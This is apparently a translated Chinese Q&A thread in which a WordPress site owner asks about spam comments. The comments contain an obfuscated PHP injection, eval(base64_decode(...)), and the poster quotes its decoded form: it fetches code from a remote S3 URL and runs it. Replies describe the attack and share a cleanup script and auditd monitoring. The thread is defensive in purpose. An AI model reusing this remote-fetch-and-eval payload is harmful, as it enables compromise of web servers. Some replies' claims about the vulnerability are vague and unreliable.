我今天正在使用 wordpress 博客,我收到了这样的评论。
<!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --><!--/mfunc-->
当我使用解码器解码此评论时,我得到了
$data = file_get_contents("https://s3.amazonaws.com/wordpress-core/update-framework.txt");eval($data);
我收到很多这样的评论。谁能帮我解决这个问题。?它是黑客还是表明黑客的开始?
这是一种黑客行为,或者至少是一种尝试。他们正在利用一个未解决的 wordpress 漏洞,该漏洞可以让他们下载和执行代码等。这种类型的攻击目前在网络上几乎没有公开曝光,如果它来自受过教育的来源,可能会特别令人讨厌。如果您在服务器端发现这些类型的代码片段,那么请进行更多研究以确定您是否真的被感染,如果是,感染实际达到了何种程度。我已经看到整个共享托管服务器被单个 wordpress 站点管理员感染,要么通过无知允许,要么积极帮助这个问题传播。不幸的是,这个特殊的问题目前在网络上没有很好的记录,所以你可能需要做大量的研究来确保你的网站是好的。
这是一种PHP 代码注入攻击,最有可能试图利用 wordpress 框架中的已知漏洞。它使用 Base64 编码的 PHP 代码将自己注入到您的托管服务器中,eval()这是一种编程语言结构,几乎存在于所有编程语言中,包括 PHP。具有高度组织性和高级能力的黑客最近利用此漏洞对受感染的 wordpress 网站造成了绝对的破坏,因此在处理此类问题时要格外小心。
没有任何建议对我们有用。以下是我们如何在不停机的情况下从多个 wordpress 站点中删除恶意代码。
我们遇到了一个问题,我们有多个旧版 wordpress 站点共享一个文件系统,该文件系统已被此病毒渗透。
我们最终编写了一个小 Python 脚本来遍历我们的文件系统并检测恶意代码。
这是任何感兴趣的人的代码(注意:使用自负风险): https ://github.com/michigan-com/eval_scrubber
pip install eval_scrubber
// finds all infected files, will not do anything but READ
python -m eval_scrubber find .
// attempts to remove malicious code from files, potentially dangerous because it WRITEs
python -m eval_scrubber remove .
该脚本将扫描文件系统中的恶意内容,并作为单独的命令尝试删除 base64 eval 函数。
这确实是一个临时解决方案,因为该病毒的生成器使用 PHP 注释导致正则表达式不匹配。我们最终使用auditd来监控什么文件正在写入我们知道被感染的文件: http ://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a -file.html
一旦我们找到病毒的产生者,再做一个eval_scrubber remove,然后我们的问题就解决了。
我正在寻找一个好的和快速的解决方案。这将帮助您找到哪些文件感染了 eval64。然后,您可以在 Dreamweaver 中使用搜索/替换,并立即将其从所有文件中删除。
但
有一个包含短短 2 行代码的索引文件。那两条线一遍又一遍地注入 eval 。我忘记了它是哪个 index.php,但请查看文件夹:
尝试使用 Dreamweaver 在您的文件中搜索 md5。
希望你能修复它。